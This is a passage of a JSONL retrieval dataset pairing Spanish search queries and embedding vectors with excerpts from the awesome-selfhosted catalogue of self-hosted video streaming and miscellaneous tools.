video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "como puedo organizar y reproducir mi biblioteca de videos de YouTube sin descargar todo?", "v": [0.05421, 0.08945, -0.1481, -0.11578, 0.01653, -0.01737, -0.08333, 0.06419, -0.00223, -0.20889, -0.06759, -0.1486, 0.06663, 0.01351, -0.03904, -0.07907, 0.10169, -0.06659, 0.10971, -0.06849, 0.13145, 0.06606, -0.03354, 0.03075, 0.06591, -0.08405, 0.02985, 0.02501, -0.063, -0.01706, -0.03943, 0.11122, -0.02416, -0.01169, -0.10837, 0.05627, 0.06787, 0.03281, -0.12272, -0.07389, -0.12876, 0.07106, -0.10815, 0.15353, -0.07617, -0.00317, 0.10908, -0.05115, -0.07459, 0.00299, 0.02327, 0.0385, -0.0914, 0.00951, -0.03411, -0.11932, 0.00805, -0.15363, 0.00292, -0.09872, -0.0223, -0.04563, 0.08541, -0.00188, 0.10113, 0.09062, -0.0294, 0.12712, -0.06334, 0.09673, -0.1353, 0.04137, -0.03529, 0.01056, 0.00168, 0.15266, -0.04726, -0.0645, -0.04049, 0.05083, 0.00369, -0.12253, 0.00602, 0.01172, -0.04262, -0.06835, -0.01379, -0.02984, 0.07087, -0.11926, -0.06277, 0.04234, 0.00707, -0.01219, 0.00305, -0.07316, 0.09418, 0.03064, 0.01286, -0.0126, -0.05307, -0.03153, 0.00129, 0.10677, -0.00754, 0.08673, 0.02984, -0.05858, 0.05039, -0.06151, 0.05185, 0.01828, -0.01821, -0.03671, -0.04383, -0.01088, 0.01353, -0.01628, 0.05804, 0.07603, -0.00779, -0.0069, -0.08538, -0.10769, 0.02618, 0.04115, 0.06406, 0.05306, 0.01447, 0.00995, 0.04993, -0.01507, -0.06274, 0.00621, -0.00161, -0.00126, 0.02025, -0.10804, -0.05464, -0.08232, 0.05605, -0.0453, -0.0442, -0.07092, 0.0446, -0.07321, 0.07131, -0.05666, -0.09717, -0.01614, -0.02437, -0.00417, -0.00099, -0.04122, 0.00538, 0.09072, 0.05816, -0.13176, -0.04601, -0.04383, 0.0277, 0.01072, 0.03861, -0.08864, -0.08873, 0.07525, -0.02013, 0.01743, 0.00551, 0.00353, -0.06836, 0.03073, -0.01543, -0.10103, -0.04701, -0.10813, 0.01781, -0.01564, 0.13085, 0.07285, -0.06059, 0.04482, -0.01373, 0.01433, -0.07606, -0.09618, -0.01895, 0.01115, -0.0577, 0.00425, 0.00326, -0.01564, -0.02505, 0.00996, 0.05141, -0.00627, -0.14087, 0.01781, 0.02097, 0.01137, -0.02358, -0.0553, -0.03761, 0.06194, 0.03065, -0.06246, -0.05325, 0.02381, -0.0633, -0.02083, 0.00033, 0.01556, 0.01468, -0.033, -0.07411, -0.06129, 0.02797, 0.0263, 0.02857, -0.05181, 0.03063, 0.04009, 0.07256, -0.02626, -0.00794, -0.00246, 0.03204, -0.0121, 0.02303, 0.05922, -0.07002, -0.02006, -0.00907, -0.02496, 0.05699, 0.01285, 0.01088, 0.01731, -0.02128, 0.00715, -0.02991, 0.07927, -0.01476, -0.01371, -0.0406, -0.07722, -0.0875, 0.06187, 0.02958, -0.07973, 0.01468, 0.04327, 0.08449, -0.00915, -0.01963, -0.00719]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "ΒΏquΓ© programa puedo usar para generar cΓ³digos de autenticaciΓ³n de dos factores?", "v": [-0.02661, 0.03513, -0.00087, -0.04701, 0.07289, -0.10197, 0.08237, -0.05536, -0.14295, -0.10568, -0.09572, -0.02836, -0.07907, -0.04939, -0.02307, -0.03813, 0.14774, -0.12204, 0.03963, 0.01334, 0.05802, -0.15324, -0.01723, -0.15145, -0.0519, 0.05739, 0.07885, -0.01334, -0.02894, -0.00476, 0.02951, 0.00281, 0.12205, -0.07941, -0.10771, 0.07749, 0.09832, 0.12373, 0.0428, 0.09461, 0.03762, 0.06429, -0.05497, -0.0485, 0.09394, 0.05619, -0.01146, 0.04227, 0.00441, -0.03124, 0.00872, -0.01796, -0.03434, -0.02079, 0.01254, -0.08956, 0.01425, -0.09953, -0.08884, 0.01743, 0.02875, 0.01114, 0.02748, -0.02332, -0.04075, -0.09587, 0.14622, 0.02955, -0.05154, 0.05528, -0.08016, -0.00582, -0.03566, 0.02516, 0.09939, 0.08681, -0.01317, -0.12063, 0.0505, 0.08136, -0.02345, 0.01967, 0.0395, 0.01349, -0.02314, -0.03467, 0.08777, -0.06808, -0.02194, -0.16329, 0.01837, -0.03463, 0.09057, 0.01934, 0.02435, -0.06886, 0.03991, 0.06349, 0.05419, 0.04728, 0.0763, -0.12654, 0.00454, 0.1001, 0.03248, 0.08265, 0.08059, -0.05604, -0.0368, 0.00684, -0.11285, -0.11391, -0.14794, -0.01318, -0.09738, 0.00517, 0.02322, -0.07591, -0.02013, -0.10188, -0.07525, 0.04104, -0.08161, 0.03605, 0.04015, 0.06859, 0.0086, 0.08609, -0.05866, 0.02239, -0.003, -0.02563, -0.01678, -0.01357, -0.08989, -0.04507, 0.04918, -0.06973, 0.05409, 0.05867, 0.00472, 0.04332, 0.06668, 0.0735, -0.00853, 0.02184, -0.08158, -0.13086, -0.15186, 0.03791, 0.01532, 0.00847, -0.03403, 0.02202, -0.09873, -0.01498, 0.02729, -0.0289, -0.06143, -0.01041, -0.12643, 0.00348, -0.07405, -0.00769, 0.08981, -0.03489, 0.06083, 0.02426, 0.04492, 0.11038, 0.03539, 0.05834, 0.12568, -0.09802, 0.04864, -0.01951, -0.03626, -0.09157, -0.07793, -0.05163, -0.07212, 0.06118, 0.08762, -0.04994, 0.01738, 0.04803, 0.02748, 0.05687, 0.00625, 0.00515, 0.01091, 0.03549, 0.01906, 0.02971, 0.00125, 0.01096, 0.06158, -0.01054, 0.05043, -0.08724, -0.03868, 0.04019, 0.03184, -0.04261, 0.10967, 0.11052, -0.0868, -0.05296, 0.05089, 0.05656, 0.00566, -0.07627, 0.06579, 0.01742, -0.08567, 0.02553, -0.08486, 0.07582, 0.0593, -0.01815, 0.00895, 0.0076, 0.00687, 0.04959, 0.01742, -0.07163, 0.00716, 0.01834, 0.03401, 0.01377, -0.01446, -0.03672, -0.02776, 0.02522, 0.04239, 0.00372, -0.00846, -0.00344, -0.02734, -0.08472, 0.00587, 0.04436, 0.00134, -0.07148, 0.0005, 0.02222, -0.08169, -0.01745, -0.02182, 0.0068, -0.02099, 0.00328, 0.01508, 0.00908, 0.03396, 0.01427]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo sincronizar mi portapapeles entre dispositivos sin que nadie lo vea?", "v": [-0.14344, 0.03198, -0.21377, -0.06176, -0.00729, -0.03459, -0.00633, -0.05898, -0.11943, -0.09549, -0.03606, 0.01533, 0.03823, -0.09467, 0.06719, 0.00015, 0.0046, -0.0231, 0.07406, 0.00186, -0.14272, -0.01282, -0.04037, -0.0477, -0.05725, 0.03476, 0.18936, 0.06322, -0.24896, -0.03814, -0.10717, -0.02612, 0.16623, -0.05318, -0.08319, -0.06553, 0.01671, 0.08948, -0.00047, 0.09024, -0.04536, 0.08147, -0.01582, 0.02682, 0.04933, -0.03711, -0.02905, 0.01882, -0.00928, 0.16814, -0.14586, -0.13278, -0.09028, -0.02853, 0.01182, -0.14297, 0.23507, -0.0477, 0.15381, -0.07519, -0.10299, 0.06113, -0.07919, -0.0576, 0.00307, -0.01498, 0.00802, -0.04718, -0.02802, 0.08846, 0.04484, 0.01906, 0.01699, 0.00465, 0.02869, 0.10332, -0.0712, 0.0164, 0.02769, 0.11857, 0.1094, -0.02776, -0.09104, -0.10116, -0.04274, -0.05511, 0.03404, 0.07948, 0.078, -0.06908, 0.03076, 0.08601, -0.00221, -0.03071, -0.01871, -0.00848, -0.01603, 0.00645, -0.05978, 0.00602, 0.13047, 0.00606, -0.12581, 0.01827, -0.06114, 0.0048, 0.00657, -0.0424, 0.02506, -0.02722, 0.11131, 0.04407, -0.01143, -0.06639, -0.03143, 0.09597, -0.02298, -0.08971, -0.05857, -0.07478, 0.02797, -0.03894, -0.00511, -0.07517, 0.06687, 0.00861, 0.00399, 0.06152, 0.0451, -0.02515, 0.06736, -0.04669, -0.00139, -0.03675, 0.03005, -0.0688, -0.05375, -0.15111, -0.02008, -0.00014, 0.02929, 0.04729, -0.01781, -0.07233, 0.01459, -0.01043, 0.0028, 0.00662, -0.00872, -0.03803, -0.01192, -0.07187, -0.0017, -0.0101, -0.03951, 0.06406, -0.0045, 0.0821, -0.09026, 0.012, -0.09707, -0.00686, 0.04257, -0.00759, -0.026, 0.0087, 0.04807, 0.00033, 0.02511, -0.02159, 0.02046, 0.02557, 0.05094, 0.05969, 0.00531, -0.05957, -0.03417, 0.0411, 0.02674, -0.08162, -0.03963, 0.04715, -0.01405, -0.04702, 0.01232, -0.04119, 0.00444, 0.01169, 0.00056, 0.02302, -0.0226, -0.00136, 0.05416, -0.02767, 0.0075, -0.02274, 0.03211, -0.05341, -0.01204, 0.03143, -0.03394, 0.03296, 0.04093, -0.01652, 0.05352, 0.04009, -0.0408, 0.01072, -0.00305, 0.04759, 0.02181, 0.00499, -0.00396, -0.00984, -0.00968, 0.01367, -0.0208, 0.06509, -0.03141, -0.03461, 0.0911, 0.00751, 0.03987, 0.00636, -0.03032, 0.07906, -0.01894, 0.04741, -0.0164, -0.07633, -0.00673, -0.05738, -0.00488, 0.0144, 0.02903, -0.04416, -0.04323, -0.03313, -0.01593, 0.00607, -0.06639, 0.03684, 0.05727, -0.05457, -0.07789, -0.03524, -0.02709, -0.06383, -0.06754, -0.08046, -0.00976, 0.03815, 0.0684, -0.03728, 0.04725, 0.03919]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "cual es una aplicacion para ayudar a los cuidadores a registrar el sueΓ±o y las comidas de un bebe?", "v": [0.10317, 0.03602, -0.0681, -0.04359, -0.01663, -0.02923, -0.10914, -0.03222, -0.11756, -0.09712, -0.12899, -0.0959, -0.04866, -0.04117, -0.11781, -0.06882, 0.06443, 0.17059, 0.01528, 0.00346, 0.0879, 0.07319, -0.0185, 0.07905, -0.10113, 0.04591, 0.1775, 0.04715, -0.08064, 0.14001, -0.08732, -0.09484, 0.0906, -0.0441, -0.10537, -0.00238, -0.10143, 0.00689, -0.14998, -0.0247, 0.01974, -0.02828, -0.03838, 0.03181, -0.03917, 0.10521, 0.07382, 0.00972, -0.09541, -0.01991, -0.01601, 0.03727, 0.0288, -0.0322, -0.06398, 0.04728, 0.04251, -0.10209, 0.03843, 0.07942, -0.10453, 0.00845, 0.1097, 0.01392, 0.01477, -0.05191, 0.05781, 0.14437, -0.02677, -0.04538, -0.02033, 0.1614, 0.01769, -0.11816, 0.03028, 0.04499, -0.02195, -0.11355, 0.03662, -0.11238, 0.01714, -0.02666, -0.09466, 0.01486, -0.03765, -0.01205, -0.00364, 0.03687, 0.03381, -0.00527, 0.10836, 0.00459, -0.03123, -0.04105, -0.01067, 0.01118, 0.14752, -0.00856, -0.00748, 0.06485, 0.07251, -0.00451, -0.03872, 0.13205, -0.02948, -0.01913, 0.07199, -0.07099, -0.10362, -0.05711, 0.00625, -0.0284, -0.11219, -0.03962, -0.03263, -0.01656, -0.12891, -0.06556, 0.11843, -0.0818, -0.01797, 0.03055, 0.01745, 0.09556, 0.04171, 0.05813, -0.02091, 0.05125, 0.00681, 0.09426, -0.02031, 0.01726, -0.06795, -0.02921, -0.04268, 0.02025, -0.04846, 0.0738, 0.08061, 0.07832, 0.02056, -0.00627, -0.04555, -0.04655, -0.03031, 0.00282, 0.01447, -0.00529, -0.03663, 0.04347, 0.00651, 0.03463, 0.06753, 0.04246, 0.00621, 0.06634, -0.07301, -0.04655, -0.02097, 0.04058, 0.00773, -0.00535, -0.0922, -0.07118, -0.03231, -0.07531, -0.01099, -0.03627, 0.0669, 0.1119, -0.10006, 0.01896, -0.0135, -0.02156, 0.03898, -0.04062, -0.11078, -0.0182, 0.0271, -0.08053, -0.10316, 0.04312, 0.01328, 0.11752, 0.05858, -0.08383, 0.00986, 0.00508, -0.05303, 0.05369, 0.08558, 0.02725, -0.02573, -0.04649, -0.02522, -0.02542, -0.00755, -0.01647, 0.10418, -0.05546, -0.0628, -0.08058, -0.02724, -0.07757, -0.01698, -0.00238, 0.00307, 0.08375, 0.02964, 0.01962, 0.02379, -0.03624, 0.00211, -0.01484, -0.06943, 0.02601, -0.02203, -0.01717, -0.0266, -0.0242, -0.03499, 0.01471, 0.0107, -0.01987, -0.00968, 0.00119, 0.12111, 0.07799, -0.03171, 0.04541, 0.02648, -0.00801, -0.02986, 0.03725, 0.02173, 0.04043, 0.00669, -0.03629, -0.04227, -0.05275, -0.05509, 0.03816, -0.00684, -0.06921, -0.02626, -0.06894, -0.06811, -0.0, 0.01807, -0.06137, 0.00852, 0.00929, 0.10318, -0.07389, 0.07683, -0.05972]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "quΓ© programa puedo usar para procesar y editar archivos de audio directamente en el navegador?", "v": [0.07445, 0.04105, -0.1309, -0.21097, -0.01199, -0.05143, 0.08748, -0.06732, -0.09664, -0.15537, -0.13999, -0.10195, -0.09608, -0.06172, -0.03545, -0.00507, 0.1818, -0.04102, 0.07713, 0.04245, 0.02507, 0.0166, -0.08595, -0.04345, -0.02884, 0.03501, 0.02347, 0.02635, -0.08016, -0.05595, -0.10283, 0.0417, 0.19344, -0.09869, -0.10716, 0.0312, 0.09275, 0.06647, 0.00124, 0.14783, 0.0291, 0.02163, -0.04678, 0.06288, -0.01252, -0.02199, 0.08422, -0.07527, -0.07329, -0.11327, 0.06027, 0.00994, -0.10015, 0.13348, -0.00506, -0.0465, -0.00466, -0.22003, 0.00656, -0.0816, 0.01211, 0.05855, 0.02367, 0.00946, -0.04844, -0.01785, 0.04931, -0.02367, -0.07011, 0.11768, -0.06445, 0.09519, 0.09006, 0.08526, 0.02792, 0.03999, -0.04706, -0.02896, 0.10156, -0.02299, 0.05144, -0.00664, 0.04863, -0.01078, -0.12136, -0.0246, 0.04755, -0.02132, -0.00155, -0.04135, -0.00245, 0.05136, 0.00484, -0.05976, 0.05273, -0.14302, 0.14189, -0.01199, 0.0242, -0.03251, 0.02003, -0.03681, -0.02653, 0.1809, 0.02987, 0.03109, 0.09011, -0.05374, -0.00059, -0.00411, -0.00422, 0.00273, -0.02154, -0.041, -0.09143, 0.04506, 0.01002, -0.08383, -0.03471, -0.08731, -0.0921, 0.08432, -0.10022, -0.03446, 0.0376, 0.00431, 0.04849, 0.05961, -0.09544, 0.05287, 0.0304, -0.06923, -0.05917, -0.07319, -0.07482, -0.05065, -0.00734, -0.0081, 0.05572, -0.00196, 0.1004, 0.01943, -0.0455, 0.05606, 0.09825, -0.02284, -0.0196, -0.03233, -0.0317, -0.10229, 0.07002, -0.03316, -0.02257, -0.04529, -0.04715, 0.01074, 0.01845, -0.07085, -0.03843, 0.03519, -0.08835, 0.04001, -0.06009, -0.01088, 0.05697, -0.09619, -0.01213, 0.03781, 0.07844, -0.01504, 0.05046, 0.03606, 0.03471, -0.09653, -0.02554, 0.03306, -0.05584, -0.01016, 0.08713, -0.02547, -0.02594, 0.00617, 0.01181, -0.01899, -0.06332, -0.0106, 0.02435, -0.02384, -0.1046, 0.07226, -0.04648, 0.0695, 0.00158, 0.0195, 0.04147, -0.00542, -0.05788, -0.01139, -0.05971, -0.03241, -0.0364, -0.02223, 0.00436, 0.00467, 0.06643, 0.05013, -0.01005, -0.0274, 0.07135, 0.08064, -0.02172, -0.0354, 0.06542, 0.04082, 0.00349, 0.03556, 0.00282, 0.06198, 0.03674, 0.01347, 0.0241, 0.03706, 0.0933, 0.0189, 0.05534, -0.02623, 0.04348, -0.02111, -0.04151, -0.00739, -0.00817, -0.00901, -0.03107, -0.02208, 0.00551, 0.00614, -0.01425, -0.00168, -0.02629, -0.02698, -0.0129, 0.09983, -0.00411, 0.00697, -0.02918, -0.00357, -0.05221, 0.02181, 0.00799, -0.03158, -0.04079, 0.04993, 0.0198, -0.03699, 0.02371, 0.03624]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "con quΓ© herramienta montaje o unifico videos sin instalar nada pesado?", "v": [0.07405, 0.04198, -0.26747, -0.12277, 0.01422, -0.07036, -0.10738, -0.08524, -0.15324, -0.08429, -0.11079, -0.05869, -0.09874, -0.0396, -0.00723, 0.08233, 0.10729, -0.16726, 0.03792, -0.03319, -0.05815, -0.06199, -0.03899, -0.05766, -0.01322, 0.06779, 0.01102, -0.02697, -0.26077, -0.14572, 0.10097, 0.09876, 0.0204, 0.01182, -0.08012, -0.10185, -0.03151, 0.01053, 0.01018, 0.102, 0.04413, -0.01219, -0.0697, 0.08581, -0.00203, -0.04369, 0.06921, -0.04103, 0.07508, 0.06487, 0.07073, -0.03716, -0.00991, -0.03406, -0.03653, -0.18004, 0.20394, -0.07184, 0.06432, -0.04162, -0.07545, 0.13987, -0.05485, 0.05658, 0.00202, 0.08597, -0.03704, -0.03282, -0.0589, 0.00152, -0.03188, -0.03382, 0.00282, -0.00859, -0.04476, 0.139, 0.02151, -0.04155, 0.01249, 0.03721, 0.09692, -0.07166, -0.01349, 0.00566, -0.07232, -0.07054, 0.05686, 0.02215, -0.02147, -0.07123, -0.03562, -0.01403, -0.03698, 0.00944, 0.11319, -0.07678, 0.07634, 0.01205, 0.03125, 0.04497, 0.13542, -0.06938, 0.00477, 0.04571, 0.03655, 0.01379, -0.01611, -0.04273, -0.0208, -0.03792, 0.13884, 0.09989, 0.04517, -0.03857, -0.01089, 0.08101, -0.02343, -0.04792, -0.09864, -0.05721, 0.0555, 0.06125, -0.00306, 0.01391, 0.00242, -0.01909, 0.02576, 0.09424, -0.05552, 0.03061, 0.02556, -0.11963, 0.02052, 0.00015, -0.02439, -0.06812, 0.02574, -0.10894, -0.08874, -0.01564, 0.04063, 0.06803, -0.05788, -0.08027, 0.02315, 0.07831, 0.00409, 0.00369, -0.01209, -0.0064, 0.03607, 0.01258, -0.02125, -0.04765, -0.0111, -0.02775, 0.02377, 0.01255, -0.06293, -0.01675, -0.03908, 0.00153, 0.05559, -0.03259, -0.03118, 0.04538, -0.06198, 0.02221, 0.05538, 0.06131, 0.03071, 0.0412, 0.04423, 0.02797, 0.01192, -0.01889, -0.00374, -0.03818, 0.02119, -0.07286, -0.05508, 0.04984, 0.02575, 0.08487, 0.01617, -0.02986, -0.02019, -0.02266, 0.0026, -0.00404, 0.03452, 0.04415, -0.03362, -0.08719, 0.03664, -0.04173, -0.03702, -0.11684, -0.02332, 0.06783, -0.01504, 0.01376, -0.00577, -0.03114, 0.02895, 0.07662, -0.04947, 0.05575, 0.03066, 0.08746, 0.02448, 0.04359, -0.02639, -0.05124, 0.07695, -0.0081, -0.02095, 0.02786, -0.06642, 0.07583, -0.02453, -0.04202, 0.01151, -0.02935, -0.04443, -0.00765, 0.00392, 0.04982, -0.00815, 0.02934, -0.01194, -0.05668, -0.00817, -0.00321, 0.00569, -0.04609, 0.02743, 0.0238, -0.04638, 0.00287, -0.01614, 0.05789, -0.00511, 0.00359, -0.0848, -0.05598, 0.03962, 0.02272, 0.00217, -0.08624, -0.01599, 0.02319, 0.02628, -0.04028, -0.02954, -0.02662]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "quΓ© software gratuito sirve para hacer composiciones grΓ‘ficas simples desde la web?", "v": [0.13955, 0.09954, -0.08043, -0.09309, 0.02998, -0.1587, 0.04159, -0.05475, -0.05257, -0.08151, -0.03874, -0.04233, -0.05451, -0.14421, 0.12729, 0.02503, 0.11279, -0.17626, 0.02536, 0.06744, -0.03257, -0.00667, -0.0386, -0.1122, -0.12191, -0.08316, 0.06225, -0.09064, -0.14998, 0.11325, 0.03017, 0.0046, 0.02956, -0.07992, -0.11058, 0.01116, 0.09692, 0.01681, -0.02998, -0.0526, 0.01139, -0.07537, -0.04415, 0.07802, -0.04926, -0.09477, -0.00103, 0.02534, -0.01775, -0.02069, 0.08049, -0.0187, 0.04286, -0.01846, 0.01909, -0.15506, 0.12516, -0.22171, -0.04461, -0.00112, 0.03717, 0.13417, 0.07033, 0.04158, 0.06079, -0.00825, -0.00805, -0.05176, 0.00091, 0.00535, 0.01467, 0.062, 0.09753, -0.04009, 0.08669, 0.01885, -0.07319, -0.05489, -0.01295, 0.01833, 0.07842, 0.007, -0.09358, -0.03892, -0.07839, -0.03082, 0.07593, -0.06554, -0.01493, -0.0205, 0.06271, 0.01558, -0.01951, 0.1227, 0.03005, -0.09538, 0.04121, 0.02912, 0.1099, 0.09118, 0.01825, -0.05442, -0.09373, -0.03076, -0.04243, 0.05122, 0.10707, 0.0053, -0.10069, -0.03517, -0.02168, 0.0047, -0.01777, -0.01775, 0.01658, -0.04017, 0.09221, -0.03071, 0.04646, 0.01177, 0.0273, -0.01029, -0.08762, -0.01488, -0.06189, 0.02986, 0.03999, 0.14238, -0.05106, 0.04367, -0.01122, -0.10365, -0.07517, -0.06626, -0.00977, -0.01863, 0.04351, -0.11651, 0.02317, -0.01256, 0.06245, 0.09555, -0.06295, -0.03587, 0.04591, -0.01509, 0.0304, -0.0323, -0.04022, -0.00228, -0.00364, 0.01703, -0.10174, 0.05629, 0.01137, 0.05041, 0.0195, -0.07063, -0.04586, -0.02594, -0.04859, 0.09843, -0.03234, 0.01164, -0.02312, 0.00285, -0.11285, 0.04083, 0.04014, 0.08782, -0.03976, 0.10527, 0.01864, -0.14083, -0.00594, -0.05492, -0.08152, -0.05269, -0.03412, -0.08249, -0.01911, -0.03206, 0.02626, 0.01563, -0.05209, 0.01255, 0.02463, 0.01112, 0.04136, 0.00308, -0.04177, 0.05979, -0.08832, 0.03148, 0.07546, 0.02023, -0.07818, -0.0455, -0.07239, -0.00809, -0.07674, -0.08425, -0.03207, -0.03011, 0.05008, 0.10093, -0.00512, 0.08779, 0.02197, 0.09559, -0.05734, 0.03324, -0.01271, -0.05997, -0.01261, -0.02623, 0.03773, -0.03516, -0.01249, -0.00069, 0.01142, 0.00728, 0.04042, 0.0236, 0.0245, 0.03361, 0.0225, 0.03202, 0.04638, 0.06857, -0.01802, 0.04097, -0.02857, -0.01063, 0.00339, -0.01923, -0.03255, -0.01514, -0.02827, -0.0504, 0.05934, 0.05206, -0.00595, -0.01705, -0.02275, -0.10205, -0.03733, -0.05138, 0.03764, -0.03717, -0.05243, 0.06726, 0.02295, 0.04249, -0.01911, 